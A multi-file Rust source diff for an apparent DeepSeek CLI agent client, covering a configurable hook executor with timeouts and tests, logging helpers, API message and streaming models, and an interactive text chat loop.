pub duration: Duration,
|
||||
/// Error message if execution failed
|
||||
pub error: Option<String>,
|
||||
}
|
||||
|
||||
/// Executor for running hooks
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct HookExecutor {
|
||||
config: HooksConfig,
|
||||
default_working_dir: PathBuf,
|
||||
session_id: String,
|
||||
}
|
||||
|
||||
impl HookExecutor {
|
||||
fn build_shell_command(command: &str) -> Command {
|
||||
#[cfg(windows)]
|
||||
{
|
||||
let mut cmd = Command::new("cmd");
|
||||
cmd.arg("/C").arg(command);
|
||||
cmd
|
||||
}
|
||||
#[cfg(not(windows))]
|
||||
{
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c").arg(command);
|
||||
cmd
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new `HookExecutor` with configuration
|
||||
pub fn new(config: HooksConfig, default_working_dir: PathBuf) -> Self {
|
||||
// Generate a session ID
|
||||
let session_id = format!("sess_{}", &uuid::Uuid::new_v4().to_string()[..8]);
|
||||
Self {
|
||||
config,
|
||||
default_working_dir,
|
||||
session_id,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a disabled `HookExecutor` (no hooks will run)
|
||||
pub fn disabled() -> Self {
|
||||
Self {
|
||||
config: HooksConfig {
|
||||
enabled: false,
|
||||
..Default::default()
|
||||
},
|
||||
default_working_dir: PathBuf::from("."),
|
||||
session_id: String::new(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if hooks are enabled
|
||||
pub fn is_enabled(&self) -> bool {
|
||||
self.config.enabled
|
||||
}
|
||||
|
||||
/// Get the session ID
|
||||
pub fn session_id(&self) -> &str {
|
||||
&self.session_id
|
||||
}
|
||||
|
||||
/// Execute all hooks for an event
|
||||
pub fn execute(&self, event: HookEvent, context: &HookContext) -> Vec<HookResult> {
|
||||
if !self.config.enabled {
|
||||
return Vec::new();
|
||||
}
|
||||
|
||||
let hooks = self.config.hooks_for_event(event);
|
||||
let env_vars = context.to_env_vars();
|
||||
let mut results = Vec::new();
|
||||
|
||||
for hook in hooks {
|
||||
if !self.matches_condition(hook, context) {
|
||||
continue;
|
||||
}
|
||||
|
||||
let result = if hook.background {
|
||||
self.execute_background(hook, &env_vars)
|
||||
} else {
|
||||
self.execute_sync(hook, &env_vars)
|
||||
};
|
||||
|
||||
let should_continue = result.success || hook.continue_on_error;
|
||||
results.push(result);
|
||||
|
||||
if !should_continue {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
results
|
||||
}
|
||||
|
||||
/// Check if a hook's condition matches the context
|
||||
#[allow(clippy::only_used_in_recursion)]
|
||||
fn matches_condition(&self, hook: &Hook, context: &HookContext) -> bool {
|
||||
match &hook.condition {
|
||||
None | Some(HookCondition::Always) => true,
|
||||
Some(HookCondition::ToolName { name }) => {
|
||||
context.tool_name.as_ref().is_some_and(|n| n == name)
|
||||
}
|
||||
Some(HookCondition::ToolCategory { category }) => {
|
||||
// Map tool names to categories
|
||||
let tool_category = context.tool_name.as_ref().map(|name| match name.as_str() {
|
||||
"exec_shell" => "shell",
|
||||
"write_file" | "edit_file" | "apply_patch" => "file_write",
|
||||
"read_file" | "list_dir" | "grep_files" => "safe",
|
||||
_ => "other",
|
||||
});
|
||||
tool_category.is_some_and(|c| c == category.as_str())
|
||||
}
|
||||
Some(HookCondition::Mode { mode }) => context
|
||||
.mode
|
||||
.as_ref()
|
||||
.is_some_and(|m| m.to_lowercase() == mode.to_lowercase()),
|
||||
Some(HookCondition::ExitCode { code }) => context.tool_exit_code == Some(*code),
|
||||
Some(HookCondition::All { conditions }) => conditions.iter().all(|c| {
|
||||
self.matches_condition(
|
||||
&Hook {
|
||||
condition: Some(c.clone()),
|
||||
..hook.clone()
|
||||
},
|
||||
context,
|
||||
)
|
||||
}),
|
||||
Some(HookCondition::Any { conditions }) => conditions.iter().any(|c| {
|
||||
self.matches_condition(
|
||||
&Hook {
|
||||
condition: Some(c.clone()),
|
||||
..hook.clone()
|
||||
},
|
||||
context,
|
||||
)
|
||||
}),
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute a hook synchronously
|
||||
fn execute_sync(&self, hook: &Hook, env_vars: &HashMap<String, String>) -> HookResult {
|
||||
let started = Instant::now();
|
||||
let working_dir = self
|
||||
.config
|
||||
.working_dir
|
||||
.clone()
|
||||
.unwrap_or_else(|| self.default_working_dir.clone());
|
||||
|
||||
let timeout_secs = self
|
||||
.config
|
||||
.default_timeout_secs
|
||||
.unwrap_or(hook.timeout_secs);
|
||||
let timeout = Duration::from_secs(timeout_secs);
|
||||
|
||||
let mut child = match Self::build_shell_command(&hook.command)
|
||||
.current_dir(&working_dir)
|
||||
.envs(env_vars)
|
||||
.stdout(Stdio::piped())
|
||||
.stderr(Stdio::piped())
|
||||
.spawn()
|
||||
{
|
||||
Ok(child) => child,
|
||||
Err(e) => {
|
||||
return HookResult {
|
||||
name: hook.name.clone(),
|
||||
success: false,
|
||||
exit_code: None,
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration: started.elapsed(),
|
||||
error: Some(format!("Failed to spawn hook: {e}")),
|
||||
};
|
||||
}
|
||||
};
|
||||
|
||||
fn read_pipe(mut pipe: impl Read) -> String {
|
||||
let mut buf = String::new();
|
||||
let _ = pipe.read_to_string(&mut buf);
|
||||
buf
|
||||
}
|
||||
|
||||
match child.wait_timeout(timeout) {
|
||||
Ok(Some(status)) => HookResult {
|
||||
name: hook.name.clone(),
|
||||
success: status.success(),
|
||||
exit_code: status.code(),
|
||||
stdout: child.stdout.take().map(read_pipe).unwrap_or_default(),
|
||||
stderr: child.stderr.take().map(read_pipe).unwrap_or_default(),
|
||||
duration: started.elapsed(),
|
||||
error: None,
|
||||
},
|
||||
Ok(None) => {
|
||||
let _ = child.kill();
|
||||
let _ = child.wait();
|
||||
HookResult {
|
||||
name: hook.name.clone(),
|
||||
success: false,
|
||||
exit_code: None,
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration: started.elapsed(),
|
||||
error: Some(format!("Hook timed out after {}s", timeout_secs)),
|
||||
}
|
||||
}
|
||||
Err(e) => HookResult {
|
||||
name: hook.name.clone(),
|
||||
success: false,
|
||||
exit_code: None,
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration: started.elapsed(),
|
||||
error: Some(format!("Failed to wait for hook: {e}")),
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute a hook in the background (non-blocking)
|
||||
fn execute_background(&self, hook: &Hook, env_vars: &HashMap<String, String>) -> HookResult {
|
||||
let started = Instant::now();
|
||||
let working_dir = self
|
||||
.config
|
||||
.working_dir
|
||||
.clone()
|
||||
.unwrap_or_else(|| self.default_working_dir.clone());
|
||||
|
||||
let cmd = hook.command.clone();
|
||||
let env = env_vars.clone();
|
||||
let wd = working_dir.clone();
|
||||
|
||||
// Spawn in a detached thread
|
||||
std::thread::spawn(move || {
|
||||
let _ = HookExecutor::build_shell_command(&cmd)
|
||||
.current_dir(&wd)
|
||||
.envs(&env)
|
||||
.output();
|
||||
});
|
||||
|
||||
// Return immediately with success (background execution is fire-and-forget)
|
||||
HookResult {
|
||||
name: hook.name.clone(),
|
||||
success: true,
|
||||
exit_code: None,
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration: started.elapsed(),
|
||||
error: None,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use std::collections::HashMap;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[test]
|
||||
fn test_hook_event_as_str() {
|
||||
assert_eq!(HookEvent::SessionStart.as_str(), "session_start");
|
||||
assert_eq!(HookEvent::ToolCallAfter.as_str(), "tool_call_after");
|
||||
assert_eq!(HookEvent::ModeChange.as_str(), "mode_change");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hook_context_to_env_vars() {
|
||||
let ctx = HookContext::new()
|
||||
.with_tool_name("exec_shell")
|
||||
.with_mode("agent")
|
||||
.with_workspace(PathBuf::from("/tmp"));
|
||||
|
||||
let env = ctx.to_env_vars();
|
||||
|
||||
assert_eq!(
|
||||
env.get("DEEPSEEK_TOOL_NAME"),
|
||||
Some(&"exec_shell".to_string())
|
||||
);
|
||||
assert_eq!(env.get("DEEPSEEK_MODE"), Some(&"agent".to_string()));
|
||||
assert_eq!(env.get("DEEPSEEK_WORKSPACE"), Some(&"/tmp".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hook_condition_always() {
|
||||
let hook = Hook::new(HookEvent::SessionStart, "echo test");
|
||||
let executor = HookExecutor::disabled();
|
||||
let context = HookContext::new();
|
||||
|
||||
assert!(executor.matches_condition(&hook, &context));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hook_condition_tool_name() {
|
||||
let hook = Hook::new(HookEvent::ToolCallBefore, "echo test").with_condition(
|
||||
HookCondition::ToolName {
|
||||
name: "exec_shell".to_string(),
|
||||
},
|
||||
);
|
||||
|
||||
let executor = HookExecutor::disabled();
|
||||
|
||||
let context_match = HookContext::new().with_tool_name("exec_shell");
|
||||
let context_no_match = HookContext::new().with_tool_name("write_file");
|
||||
|
||||
assert!(executor.matches_condition(&hook, &context_match));
|
||||
assert!(!executor.matches_condition(&hook, &context_no_match));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hook_condition_mode() {
|
||||
let hook =
|
||||
Hook::new(HookEvent::ModeChange, "echo test").with_condition(HookCondition::Mode {
|
||||
mode: "agent".to_string(),
|
||||
});
|
||||
|
||||
let executor = HookExecutor::disabled();
|
||||
|
||||
let context_match = HookContext::new().with_mode("AGENT"); // Case insensitive
|
||||
let context_no_match = HookContext::new().with_mode("normal");
|
||||
|
||||
assert!(executor.matches_condition(&hook, &context_match));
|
||||
assert!(!executor.matches_condition(&hook, &context_no_match));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hooks_config_for_event() {
|
||||
let config = HooksConfig {
|
||||
enabled: true,
|
||||
hooks: vec![
|
||||
Hook::new(HookEvent::SessionStart, "echo start"),
|
||||
Hook::new(HookEvent::SessionEnd, "echo end"),
|
||||
Hook::new(HookEvent::SessionStart, "echo start2"),
|
||||
],
|
||||
..Default::default()
|
||||
};
|
||||
|
||||
let start_hooks = config.hooks_for_event(HookEvent::SessionStart);
|
||||
assert_eq!(start_hooks.len(), 2);
|
||||
|
||||
let end_hooks = config.hooks_for_event(HookEvent::SessionEnd);
|
||||
assert_eq!(end_hooks.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hooks_config_disabled() {
|
||||
let config = HooksConfig {
|
||||
enabled: false,
|
||||
hooks: vec![Hook::new(HookEvent::SessionStart, "echo start")],
|
||||
..Default::default()
|
||||
};
|
||||
|
||||
let hooks = config.hooks_for_event(HookEvent::SessionStart);
|
||||
assert!(hooks.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hook_builder() {
|
||||
let hook = Hook::new(HookEvent::ToolCallAfter, "notify.sh")
|
||||
.with_name("notify_tool")
|
||||
.with_timeout(60)
|
||||
.background()
|
||||
.with_condition(HookCondition::ToolCategory {
|
||||
category: "shell".to_string(),
|
||||
});
|
||||
|
||||
assert_eq!(hook.name, Some("notify_tool".to_string()));
|
||||
assert_eq!(hook.timeout_secs, 60);
|
||||
assert!(hook.background);
|
||||
assert!(matches!(
|
||||
hook.condition,
|
||||
Some(HookCondition::ToolCategory { .. })
|
||||
));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hook_timeout_enforced() {
|
||||
let command = if cfg!(windows) {
|
||||
"ping -n 3 127.0.0.1 > nul"
|
||||
} else {
|
||||
"sleep 2"
|
||||
};
|
||||
let hook = Hook::new(HookEvent::SessionStart, command).with_timeout(1);
|
||||
let executor = HookExecutor::new(HooksConfig::default(), PathBuf::from("."));
|
||||
let env_vars = HashMap::new();
|
||||
|
||||
let result = executor.execute_sync(&hook, &env_vars);
|
||||
assert!(!result.success);
|
||||
assert!(
|
||||
result
|
||||
.error
|
||||
.as_ref()
|
||||
.is_some_and(|e| e.contains("timed out"))
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_executor_session_id() {
|
||||
let executor = HookExecutor::new(HooksConfig::default(), PathBuf::from("."));
|
||||
|
||||
assert!(executor.session_id().starts_with("sess_"));
|
||||
assert_eq!(executor.session_id().len(), 13); // "sess_" + 8 chars
|
||||
}
|
||||
}
|
||||
+1073
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,35 @@
|
||||
//! Lightweight verbose logging helpers for the CLI.
|
||||
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
|
||||
use colored::Colorize;
|
||||
|
||||
use crate::palette;
|
||||
static VERBOSE: AtomicBool = AtomicBool::new(false);
|
||||
|
||||
/// Enable or disable verbose logging output.
|
||||
pub fn set_verbose(enabled: bool) {
|
||||
VERBOSE.store(enabled, Ordering::SeqCst);
|
||||
}
|
||||
|
||||
/// Check whether verbose logging is enabled.
|
||||
#[must_use]
|
||||
pub fn is_verbose() -> bool {
|
||||
VERBOSE.load(Ordering::SeqCst)
|
||||
}
|
||||
|
||||
/// Emit a verbose info message (no-op when verbosity is disabled).
|
||||
pub fn info(message: impl AsRef<str>) {
|
||||
if is_verbose() {
|
||||
let (r, g, b) = palette::DEEPSEEK_SKY_RGB;
|
||||
eprintln!("{} {}", "info".truecolor(r, g, b).bold(), message.as_ref());
|
||||
}
|
||||
}
|
||||
|
||||
/// Emit a verbose warning message (no-op when verbosity is disabled).
|
||||
pub fn warn(message: impl AsRef<str>) {
|
||||
if is_verbose() {
|
||||
let (r, g, b) = palette::DEEPSEEK_SKY_RGB;
|
||||
eprintln!("{} {}", "warn".truecolor(r, g, b).bold(), message.as_ref());
|
||||
}
|
||||
}
|
||||
+1520
File diff suppressed because it is too large
Load Diff
+1003
File diff suppressed because it is too large
Load Diff
+200
@@ -0,0 +1,200 @@
|
||||
//! API request/response models for `DeepSeek` and OpenAI-compatible endpoints.
|
||||
|
||||
use serde::{Deserialize, Serialize};
|
||||
|
||||
// === Core Message Types ===
|
||||
|
||||
/// Request payload for sending a message to the API.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct MessageRequest {
|
||||
pub model: String,
|
||||
pub messages: Vec<Message>,
|
||||
pub max_tokens: u32,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub system: Option<SystemPrompt>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub tools: Option<Vec<Tool>>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub tool_choice: Option<serde_json::Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub metadata: Option<serde_json::Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub thinking: Option<serde_json::Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub stream: Option<bool>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub temperature: Option<f32>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub top_p: Option<f32>,
|
||||
}
|
||||
|
||||
/// System prompt representation (plain text or structured blocks).
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum SystemPrompt {
|
||||
Text(String),
|
||||
Blocks(Vec<SystemBlock>),
|
||||
}
|
||||
|
||||
/// A structured system prompt block.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct SystemBlock {
|
||||
#[serde(rename = "type")]
|
||||
pub block_type: String,
|
||||
pub text: String,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub cache_control: Option<CacheControl>,
|
||||
}
|
||||
|
||||
/// A chat message with role and content blocks.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Message {
|
||||
pub role: String,
|
||||
pub content: Vec<ContentBlock>,
|
||||
}
|
||||
|
||||
/// A single content block inside a message.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(tag = "type")]
|
||||
pub enum ContentBlock {
|
||||
#[serde(rename = "text")]
|
||||
Text {
|
||||
text: String,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
cache_control: Option<CacheControl>,
|
||||
},
|
||||
#[serde(rename = "thinking")]
|
||||
Thinking { thinking: String },
|
||||
#[serde(rename = "tool_use")]
|
||||
ToolUse {
|
||||
id: String,
|
||||
name: String,
|
||||
input: serde_json::Value,
|
||||
},
|
||||
#[serde(rename = "tool_result")]
|
||||
ToolResult {
|
||||
tool_use_id: String,
|
||||
content: String,
|
||||
},
|
||||
}
|
||||
|
||||
/// Cache control metadata for tool definitions and blocks.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct CacheControl {
|
||||
#[serde(rename = "type")]
|
||||
pub cache_type: String,
|
||||
}
|
||||
|
||||
/// Tool definition exposed to the model.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Tool {
|
||||
pub name: String,
|
||||
pub description: String,
|
||||
pub input_schema: serde_json::Value,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub cache_control: Option<CacheControl>,
|
||||
}
|
||||
|
||||
/// Response payload for a message request.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct MessageResponse {
|
||||
pub id: String,
|
||||
pub r#type: String,
|
||||
pub role: String,
|
||||
pub content: Vec<ContentBlock>,
|
||||
pub model: String,
|
||||
pub stop_reason: Option<String>,
|
||||
pub stop_sequence: Option<String>,
|
||||
pub usage: Usage,
|
||||
}
|
||||
|
||||
/// Token usage metadata for a response.
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Usage {
|
||||
pub input_tokens: u32,
|
||||
pub output_tokens: u32,
|
||||
}
|
||||
|
||||
/// Map known models to their approximate context window sizes.
|
||||
#[must_use]
|
||||
pub fn context_window_for_model(model: &str) -> Option<u32> {
|
||||
let lower = model.to_lowercase();
|
||||
if lower.contains("deepseek-chat") || lower.contains("deepseek-reasoner") {
|
||||
return Some(128_000);
|
||||
}
|
||||
if lower.contains("deepseek") {
|
||||
return Some(128_000);
|
||||
}
|
||||
if lower.contains("claude") {
|
||||
return Some(200_000);
|
||||
}
|
||||
None
|
||||
}
|
||||
|
||||
// === Streaming Structures ===
|
||||
|
||||
#[allow(dead_code)]
|
||||
#[derive(Debug, Deserialize, Clone)]
|
||||
#[serde(tag = "type")]
|
||||
/// Streaming event types for SSE responses.
|
||||
pub enum StreamEvent {
|
||||
#[serde(rename = "message_start")]
|
||||
MessageStart { message: MessageResponse },
|
||||
#[serde(rename = "content_block_start")]
|
||||
ContentBlockStart {
|
||||
index: u32,
|
||||
content_block: ContentBlockStart,
|
||||
},
|
||||
#[serde(rename = "content_block_delta")]
|
||||
ContentBlockDelta { index: u32, delta: Delta },
|
||||
#[serde(rename = "content_block_stop")]
|
||||
ContentBlockStop { index: u32 },
|
||||
#[serde(rename = "message_delta")]
|
||||
MessageDelta {
|
||||
delta: MessageDelta,
|
||||
usage: Option<Usage>,
|
||||
},
|
||||
#[serde(rename = "message_stop")]
|
||||
MessageStop,
|
||||
#[serde(rename = "ping")]
|
||||
Ping,
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
#[derive(Debug, Deserialize, Clone)]
|
||||
#[serde(tag = "type")]
|
||||
/// Content block types used in streaming starts.
|
||||
pub enum ContentBlockStart {
|
||||
#[serde(rename = "text")]
|
||||
Text { text: String },
|
||||
#[serde(rename = "thinking")]
|
||||
Thinking { thinking: String },
|
||||
#[serde(rename = "tool_use")]
|
||||
ToolUse {
|
||||
id: String,
|
||||
name: String,
|
||||
input: serde_json::Value, // usually empty or partial
|
||||
},
|
||||
}
|
||||
|
||||
// Variant names match legacy streaming spec, suppressing style warning
|
||||
#[allow(clippy::enum_variant_names)]
|
||||
#[derive(Debug, Deserialize, Clone)]
|
||||
#[serde(tag = "type")]
|
||||
/// Delta events emitted during streaming responses.
|
||||
pub enum Delta {
|
||||
#[serde(rename = "text_delta")]
|
||||
TextDelta { text: String },
|
||||
#[serde(rename = "thinking_delta")]
|
||||
ThinkingDelta { thinking: String },
|
||||
#[serde(rename = "input_json_delta")]
|
||||
InputJsonDelta { partial_json: String },
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
#[derive(Debug, Deserialize, Clone)]
|
||||
/// Delta payload for message-level updates.
|
||||
pub struct MessageDelta {
|
||||
pub stop_reason: Option<String>,
|
||||
pub stop_sequence: Option<String>,
|
||||
}
|
||||
@@ -0,0 +1,3 @@
|
||||
//! Text chat workflows for DeepSeek APIs.
|
||||
|
||||
pub mod text;
|
||||
@@ -0,0 +1,754 @@
|
||||
//! Text chat workflows for `DeepSeek` and DeepSeek-compatible APIs.
|
||||
|
||||
use std::collections::HashMap;
|
||||
use std::io::{self, Write};
|
||||
use std::path::Path;
|
||||
use std::time::Instant;
|
||||
|
||||
use anyhow::{Context, Result};
|
||||
use colored::{ColoredString, Colorize};
|
||||
use rustyline::completion::{Completer, Pair};
|
||||
use rustyline::error::ReadlineError;
|
||||
use rustyline::highlight::Highlighter;
|
||||
use rustyline::hint::Hinter;
|
||||
use rustyline::history::DefaultHistory;
|
||||
use rustyline::validate::Validator;
|
||||
use rustyline::{Context as RlContext, Editor, Helper};
|
||||
use serde_json::{Value, json};
|
||||
|
||||
use crate::client::DeepSeekClient;
|
||||
use crate::models::{
|
||||
CacheControl, ContentBlock, ContentBlockStart, Delta, Message, MessageRequest, StreamEvent,
|
||||
SystemBlock, SystemPrompt, Tool, Usage,
|
||||
};
|
||||
use crate::palette;
|
||||
use crate::utils::pretty_json;
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Options for running text chat sessions.
|
||||
#[allow(clippy::struct_excessive_bools)]
|
||||
pub struct TextChatOptions {
|
||||
pub model: String,
|
||||
pub prompt: Option<String>,
|
||||
pub system: Option<String>,
|
||||
pub stream: bool,
|
||||
pub temperature: Option<f32>,
|
||||
pub top_p: Option<f32>,
|
||||
pub max_tokens: u32,
|
||||
pub cache_prompt: bool,
|
||||
pub cache_system: bool,
|
||||
pub cache_tools: bool,
|
||||
pub tools: Option<Vec<Tool>>,
|
||||
pub tool_choice: Option<Value>,
|
||||
}
|
||||
|
||||
// === Public API ===
|
||||
|
||||
pub async fn run_deepseek_chat(client: &DeepSeekClient, options: TextChatOptions) -> Result<()> {
|
||||
let mut messages: Vec<Message> = Vec::new();
|
||||
let mut stats = SessionStats::new();
|
||||
|
||||
print_banner("DeepSeek Compatible API");
|
||||
print_session_info(
|
||||
&options,
|
||||
messages.len(),
|
||||
options.tools.as_ref().map_or(0, std::vec::Vec::len),
|
||||
);
|
||||
|
||||
if let Some(prompt) = options.prompt.as_deref() {
|
||||
process_deepseek_turn(client, &options, &mut messages, prompt, &mut stats).await?;
|
||||
} else {
|
||||
let mut rl = create_editor()?;
|
||||
while let Some(line) = read_prompt(&mut rl)? {
|
||||
if handle_line_deepseek(line, client, &options, &mut messages, &mut stats).await? {
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub async fn run_official_chat(client: &DeepSeekClient, options: TextChatOptions) -> Result<()> {
|
||||
let mut messages: Vec<Value> = Vec::new();
|
||||
let mut stats = SessionStats::new();
|
||||
|
||||
if let Some(system) = options.system.clone() {
|
||||
messages.push(json!({ "role": "system", "content": system }));
|
||||
}
|
||||
|
||||
print_banner("Official API");
|
||||
print_session_info(
|
||||
&options,
|
||||
messages.len(),
|
||||
options.tools.as_ref().map_or(0, std::vec::Vec::len),
|
||||
);
|
||||
|
||||
if let Some(prompt) = options.prompt.as_deref() {
|
||||
process_official_turn(client, &options, &mut messages, prompt, &mut stats).await?;
|
||||
} else {
|
||||
let mut rl = create_editor()?;
|
||||
while let Some(line) = read_prompt(&mut rl)? {
|
||||
if handle_line_official(
|
||||
line,
|
||||
client,
|
||||
&options,
|
||||
&mut messages,
|
||||
&mut stats,
|
||||
options.system.as_deref(),
|
||||
)
|
||||
.await?
|
||||
{
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn load_tools(
|
||||
tools_file: Option<&Path>,
|
||||
tools_json: Option<&str>,
|
||||
) -> Result<Option<Vec<Tool>>> {
|
||||
let tools = if let Some(raw_json) = tools_json {
|
||||
let parsed: Vec<Tool> = serde_json::from_str(raw_json)
|
||||
.context("Failed to parse tools_json: expected an array of tool definitions.")?;
|
||||
Some(parsed)
|
||||
} else if let Some(path) = tools_file {
|
||||
let contents = std::fs::read_to_string(path)
|
||||
.with_context(|| format!("Failed to read tools file: {}", path.display()))?;
|
||||
let parsed: Vec<Tool> = serde_json::from_str(&contents)
|
||||
.with_context(|| format!("Failed to parse tools file: {}", path.display()))?;
|
||||
Some(parsed)
|
||||
} else {
|
||||
None
|
||||
};
|
||||
|
||||
Ok(tools)
|
||||
}
|
||||
|
||||
pub fn parse_tool_choice(choice: Option<&str>) -> Result<Option<Value>> {
|
||||
let Some(choice) = choice else {
|
||||
return Ok(None);
|
||||
};
|
||||
let trimmed = choice.trim();
|
||||
if trimmed.starts_with('{') || trimmed.starts_with('[') {
|
||||
let value: Value =
|
||||
serde_json::from_str(trimmed).context("Failed to parse tool_choice: expected JSON.")?;
|
||||
return Ok(Some(value));
|
||||
}
|
||||
|
||||
let value = match trimmed {
|
||||
"auto" | "none" | "any" => json!({ "type": trimmed }),
|
||||
_ => json!({ "type": "tool", "name": trimmed }),
|
||||
};
|
||||
Ok(Some(value))
|
||||
}
|
||||
|
||||
#[allow(clippy::too_many_lines)]
|
||||
async fn process_deepseek_turn(
|
||||
client: &DeepSeekClient,
|
||||
options: &TextChatOptions,
|
||||
messages: &mut Vec<Message>,
|
||||
user_input: &str,
|
||||
stats: &mut SessionStats,
|
||||
) -> Result<()> {
|
||||
let cache_control = if options.cache_prompt {
|
||||
Some(CacheControl {
|
||||
cache_type: "ephemeral".to_string(),
|
||||
})
|
||||
} else {
|
||||
None
|
||||
};
|
||||
|
||||
messages.push(Message {
|
||||
role: "user".to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: user_input.to_string(),
|
||||
cache_control,
|
||||
}],
|
||||
});
|
||||
|
||||
let request = MessageRequest {
|
||||
model: options.model.clone(),
|
||||
messages: messages.clone(),
|
||||
max_tokens: options.max_tokens,
|
||||
system: build_system_prompt(options.system.as_deref(), options.cache_system),
|
||||
tools: cache_tools(options.tools.clone(), options.cache_tools),
|
||||
tool_choice: options.tool_choice.clone(),
|
||||
metadata: None,
|
||||
thinking: None,
|
||||
stream: Some(options.stream),
|
||||
temperature: options.temperature,
|
||||
top_p: options.top_p,
|
||||
};
|
||||
|
||||
if options.stream {
|
||||
let stream = client.create_message_stream(request).await?;
|
||||
tokio::pin!(stream);
|
||||
|
||||
let mut current_thinking = String::new();
|
||||
let mut current_text = String::new();
|
||||
let mut block_types: HashMap<u32, String> = HashMap::new();
|
||||
let mut tool_blocks: HashMap<u32, (String, String, String)> = HashMap::new();
|
||||
let mut is_thinking = false;
|
||||
|
||||
while let Some(event) = futures_util::StreamExt::next(&mut stream).await {
|
||||
let event = event?;
|
||||
match event {
|
||||
StreamEvent::ContentBlockStart {
|
||||
index,
|
||||
content_block,
|
||||
} => match content_block {
|
||||
ContentBlockStart::Thinking { .. } => {
|
||||
is_thinking = true;
|
||||
block_types.insert(index, "thinking".to_string());
|
||||
println!("{}", ds_sky("Thinking 💭").dimmed());
|
||||
}
|
||||
ContentBlockStart::Text { .. } => {
|
||||
if is_thinking {
|
||||
println!();
|
||||
is_thinking = false;
|
||||
}
|
||||
block_types.insert(index, "text".to_string());
|
||||
}
|
||||
ContentBlockStart::ToolUse { id, name, .. } => {
|
||||
block_types.insert(index, "tool_use".to_string());
|
||||
tool_blocks.insert(index, (id, name.clone(), String::new()));
|
||||
println!(
|
||||
"{} {}",
|
||||
ds_blue("Tool Call:").bold(),
|
||||
ds_blue(&name).bold()
|
||||
);
|
||||
}
|
||||
},
|
||||
StreamEvent::ContentBlockDelta { index, delta } => match delta {
|
||||
Delta::ThinkingDelta { thinking } => {
|
||||
print!("{}", ds_sky(&thinking).dimmed());
|
||||
io::stdout().flush()?;
|
||||
current_thinking.push_str(&thinking);
|
||||
}
|
||||
Delta::TextDelta { text } => {
|
||||
print!("{text}");
|
||||
io::stdout().flush()?;
|
||||
current_text.push_str(&text);
|
||||
}
|
||||
Delta::InputJsonDelta { partial_json } => {
|
||||
if let Some((_id, _name, json)) = tool_blocks.get_mut(&index) {
|
||||
json.push_str(&partial_json);
|
||||
}
|
||||
}
|
||||
},
|
||||
StreamEvent::ContentBlockStop { index } => {
|
||||
if let Some(block_type) = block_types.get(&index)
|
||||
&& block_type == "tool_use"
|
||||
&& let Some((_id, name, json_str)) = tool_blocks.get(&index)
|
||||
{
|
||||
if let Ok(parsed) = serde_json::from_str::<Value>(json_str) {
|
||||
println!("{} {}", ds_blue("Tool Input:"), pretty_json(&parsed));
|
||||
} else if !json_str.is_empty() {
|
||||
println!("{} {}", ds_blue("Tool Input:"), json_str);
|
||||
}
|
||||
println!("{}", ds_blue(&format!("Tool End: {name}")).dimmed());
|
||||
}
|
||||
}
|
||||
StreamEvent::MessageDelta {
|
||||
usage: Some(usage), ..
|
||||
} => {
|
||||
stats.update(&usage);
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
